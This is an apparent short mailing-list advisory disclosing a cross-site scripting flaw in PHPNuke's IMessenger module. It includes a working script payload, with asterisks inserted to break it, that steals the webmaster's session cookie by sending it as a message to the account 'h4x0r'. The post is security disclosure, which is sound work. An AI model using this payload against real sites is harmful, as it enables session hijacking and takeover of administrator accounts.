('binary' encoding is not supported, stored as-is) IMessenger accept javascript.

We can so directly execute javascript on the
computer of a member or the webmaster.

For example, if I send the script

<*s*cript>window.location.href='http://www.SERVER.
com/im.php?username_to=h4x0r&subject='+
document.cookie
+'&message=message&action=send' ;</s*cript>

(without the '*'), to the webmaster, his cookie will be
sent to the user h4x0r.

PHPNuke was alerted.

frog-mn

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]